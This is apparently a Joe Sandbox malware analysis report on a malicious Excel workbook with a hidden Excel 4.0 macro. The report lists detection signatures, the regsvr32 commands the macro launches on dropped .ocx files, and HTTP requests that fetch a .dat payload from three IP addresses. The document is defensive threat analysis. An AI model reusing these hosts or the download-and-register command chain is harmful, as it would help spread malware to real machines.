Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Summary-573686706-Feb-15.xlsb

Overview

General Information

Sample Name:Summary-573686706-Feb-15.xlsb
Analysis ID:572744
MD5:8759fc7692ec7716642f6d871ab096a7
SHA1:929f1adad990aa9ea0f6f34f963a2fd69bd10a7b
SHA256:d91a7c07bec1136e7117642acd349bdbc7e21cdb4abf1eda8914dac94d5eb0f9
Tags:xlsx
Infos:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Sigma detected: Excel Network Connections
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 6496 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 1316 cmdline: regsvr32 C:\ProgramData\Hroser1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4820 cmdline: regsvr32 C:\ProgramData\Hroser2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4396 cmdline: regsvr32 C:\ProgramData\Hroser3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6496, ProcessCommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, ProcessId: 1316
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 185.141.26.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6496, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49750

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Summary-573686706-Feb-15.xlsbReversingLabs: Detection: 16%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities

    barindex
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.3:49750 -> 185.141.26.236:80
    Source: global trafficTCP traffic: 192.168.2.3:49750 -> 185.141.26.236:80
    Source: global trafficHTTP traffic detected: GET /2437620704597850.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2437620704597850.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2437620704597850.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.165.62.32Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 17:21:36 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 17:20:56 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 17:20:56 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.aadrm.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.aadrm.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.cortana.ai
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.diagnostics.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.office.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.onedrive.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://augloop.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://augloop.office.com/v2
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cdn.entity.
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://clients.config.office.net/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://config.edge.skype.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cortana.ai
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cortana.ai/api
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://cr.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dev.cortana.ai
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://devnull.onenote.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://directory.services.
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net/MathRecognizer.Recognize
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net/MathSolver.Solve
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://graph.ppe.windows.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://graph.windows.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://graph.windows.net/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
